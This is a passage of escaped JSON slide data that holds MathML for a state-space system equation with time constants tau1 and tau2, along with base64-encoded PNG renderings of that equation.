lGBdZAAAAAASUVORK5CYII=\&quot;,\&quot;slideId\&quot;:308,\&quot;accessibleText\&quot;:\&quot;Error converting from MathML to accessible text.\&quot;,\&quot;imageHeight\&quot;:58.532520325203244},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;mover&gt;&lt;mrow&gt;&lt;mi&gt;x&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;t&lt;/mi&gt;&lt;/mfenced&gt;&lt;/mrow&gt;&lt;mo&gt;&amp;#x2D9;&lt;/mo&gt;&lt;/mover&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mfenced open=\\\&quot;[\\\&quot; close=\\\&quot;]\\\&quot;&gt;&lt;mrow&gt;&lt;mo&gt;-&lt;/mo&gt;&lt;mfrac&gt;&lt;mrow&gt;&lt;msub&gt;&lt;mi&gt;&amp;#x3C4;&lt;/mi&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;&amp;#x3C4;&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msub&gt;&lt;/mrow&gt;&lt;mrow&gt;&lt;msub&gt;&lt;mi&gt;&amp;#x3C4;&lt;/mi&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/msub&gt;&lt;mo&gt;.&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;&amp;#x3C4;&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msub&gt;&lt;/mrow&gt;&lt;/mfrac&gt;&lt;/mrow&gt;&lt;/mfenced&gt;&lt;mi&gt;x&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;t&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mfenced open=\\\&quot;[\\\&quot; close=\\\&quot;]\\\&quot;&gt;&lt;mtable&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mfrac&gt;&lt;msub&gt;&lt;mi&gt;A&lt;/mi&gt;&lt;mn&gt;01&lt;/mn&gt;&lt;/msub&gt;&lt;msub&gt;&lt;mi&gt;&amp;#x3C4;&lt;/mi&gt;&lt;mn&gt;1&lt;/mn&gt;&lt;/msub&gt;&lt;/mfrac&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;mfrac&gt;&lt;msub&gt;&lt;mi&gt;A&lt;/mi&gt;&lt;mn&gt;02&lt;/mn&gt;&lt;/msub&gt;&lt;msub&gt;&lt;mi&gt;&amp;#x3C4;&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msub&gt;&lt;/mfrac&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;/mtable&gt;&lt;/mfenced&gt;&lt;mi&gt;u&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;t&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;,&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mi&gt;y&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;t&lt;/mi&gt;&lt;/mfenced&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mi&gt;x&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;t&lt;/mi&gt;&lt;/mfenced&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;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